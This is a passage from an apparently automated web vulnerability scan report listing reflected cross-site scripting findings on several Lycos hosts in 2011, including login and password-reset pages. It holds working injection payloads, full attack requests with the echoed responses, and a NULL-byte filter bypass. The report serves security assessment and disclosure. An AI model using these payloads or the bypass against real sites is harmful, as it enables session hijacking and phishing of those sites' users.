The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f6c"style%3d"x%3aexpression(alert(1))"62f2861325d was submitted in the x parameter. This input was echoed as a5f6c"style="x:expression(alert(1))"62f2861325d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search?x=1a5f6c"style%3d"x%3aexpression(alert(1))"62f2861325d HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 16:04:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 16:04:03 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 60454

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="/jobs/search?pn=2&amp;x=1a5f6c"style="x:expression(alert(1))"62f2861325d&amp;q=">
...[SNIP]...

1.274. http://jobs.lycos.com/search [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe453"style%3d"x%3aexpression(alert(1))"5103e16dd11 was submitted in the x parameter. This input was echoed as fe453"style="x:expression(alert(1))"5103e16dd11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?x=1fe453"style%3d"x%3aexpression(alert(1))"5103e16dd11 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 15:23:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:47 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;x=1fe453"style="x:expression(alert(1))"5103e16dd11&amp;q=">
...[SNIP]...

1.275. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc14"><script>alert(1)</script>f33690b523c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&7cc14"><script>alert(1)</script>f33690b523c=1 HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.4.10.1297090205

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:50:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&7cc14"><script>alert(1)</script>f33690b523c=1&mobile=1">
...[SNIP]...

1.276. http://peoplesearch.lycos.com/ [search-type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the search-type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7741c"><script>alert(1)</script>24c511f9dc0 was submitted in the search-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&search-type=white_pages7741c"><script>alert(1)</script>24c511f9dc0 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:23:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&search-type=white_pages7741c"><script>alert(1)</script>24c511f9dc0&mobile=1">
...[SNIP]...

1.277. http://peoplesearch.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3474d"><script>alert(1)</script>4e2dee260c6 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people3474d"><script>alert(1)</script>4e2dee260c6 HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.4.10.1297090205

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:50:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people3474d"><script>alert(1)</script>4e2dee260c6&mobile=1">
...[SNIP]...

1.278. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ac3a"><script>alert(1)</script>a1eccbcbc12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?7ac3a"><script>alert(1)</script>a1eccbcbc12=1 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:23:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?7ac3a"><script>alert(1)</script>a1eccbcbc12=1&mobile=1">
...[SNIP]...

1.279. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://registration.lycos.com
Path:   /forgot.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba03"><script>alert(1)</script>06d84703f11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forgot.php/cba03"><script>alert(1)</script>06d84703f11 HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; isMobile=nonmobile; __utmb=207906063.7.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:01 GMT
Server:
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 15:24:00 GMT
Set-Cookie: isMobile=nonmobile; expires=Mon, 07-Feb-2011 16:24:01 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5935
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="http://hb
...[SNIP]...
<form action="/forgot.php/cba03"><script>alert(1)</script>06d84703f11" method="post">
...[SNIP]...

1.280. https://registration.lycos.com/login.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://registration.lycos.com
Path:   /login.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131eb"><script>alert(1)</script>7bbbd5c508a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.php/131eb"><script>alert(1)</script>7bbbd5c508a HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090495178369; __utmc=207906063; isMobile=mobile; __utmb=207906063.7.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:47 GMT
Server:
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:56:46 GMT
Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:56:47 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 6032
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
<title>LYCOS NETWORK: Registration Login</title>
       
...[SNIP]...
<form action="/login.php/131eb"><script>alert(1)</script>7bbbd5c508a" method="post" style="padding:0px; margin:0px;">
...[SNIP]...

1.281. https://registration.lycos.com/lostpassword.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://registration.lycos.com
Path:   /lostpassword.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d547"><script>alert(1)</script>f9f2dd8189d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lostpassword.php/8d547"><script>alert(1)</script>f9f2dd8189d HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090495178369; __utmc=207906063; isMobile=mobile; __utmb=207906063.7.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:45 GMT
Server:
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:56:44 GMT
Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:56:45 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5956
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="https://h
...[SNIP]...
<form action="/lostpassword.php/8d547"><script>alert(1)</script>f9f2dd8189d" method="post">
...[SNIP]...

1.282. https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://registration.lycos.com
Path:   /lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd73"><script>alert(1)</script>f4f3653e469 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lostpassword.php/5dd73"><script>alert(1)</script>f4f3653e469=%22x:expre/**/ssion(alert(9)) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: registration.lycos.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:55:04 GMT
Server:
Set-Cookie: PENTA=173.193.214.243.1297090504967514; path=/; domain=.lycos.com
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:55:03 GMT
Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:55:04 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5984
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="https://h
...[SNIP]...
<form action="/lostpassword.php/5dd73"><script>alert(1)</script>f4f3653e469="x:expre/**/ssion(alert(9))" method="post">
...[SNIP]...

1.283. https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://registration.lycos.com
Path:   /lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 2f10a><script>alert(1)</script>016b58e2edc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lostpassword.php/%22%20stYle2f10a><script>alert(1)</script>016b58e2edc=%22x:expre/**/ssion(alert(9)) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: registration.lycos.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:55:04 GMT
Server:
Set-Cookie: PENTA=173.193.214.243.1297090504527301; path=/; domain=.lycos.com
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:55:03 GMT
Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:55:04 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5990
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="https://h
...[SNIP]...
<form action="/lostpassword.php/" stYle2f10a><script>alert(1)</script>016b58e2edc="x:expre/**/ssion(alert(9))" method="post">
...[SNIP]...

1.284. http://search.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e81ba"%3balert(1)//af5066fd037 was submitted in the cat parameter. This input was echoed as e81ba";alert(1)//af5066fd037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=multi&cat=imagese81ba"%3balert(1)//af5066fd037 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:24 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ddfqsr2hppq8qij9d4ieqghss2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_imagese81ba";alert(1)//af5066fd037";
//-->
...[SNIP]...

1.285. http://search.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b73"><script>alert(1)</script>052c690a4be was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?tab=multi&cat=images92b73"><script>alert(1)</script>052c690a4be HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:24 GMT; path=/
Set-Cookie: LYCOS_SEARCH=2hh4b57i87910i70ds7mfjm932; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images92b73"><script>alert(1)</script>052c690a4be&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.286. http://search.lycos.com/ [mobile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32777"><script>alert(1)</script>df0c8dd5168 was submitted in the mobile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?tab=people&mobile=132777"><script>alert(1)</script>df0c8dd5168 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/
Set-Cookie: LYCOS_SEARCH=hjmhvrge1a613s8sqffiuss0k4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&mobile=132777"><script>alert(1)</script>df0c8dd5168&diktfc=6A6DBC228ADE4617A913BE636EF29CDEDBB6A4EBFE67&mobile=1">
...[SNIP]...

1.287. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9be9"><script>alert(1)</script>3e6249bcdc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

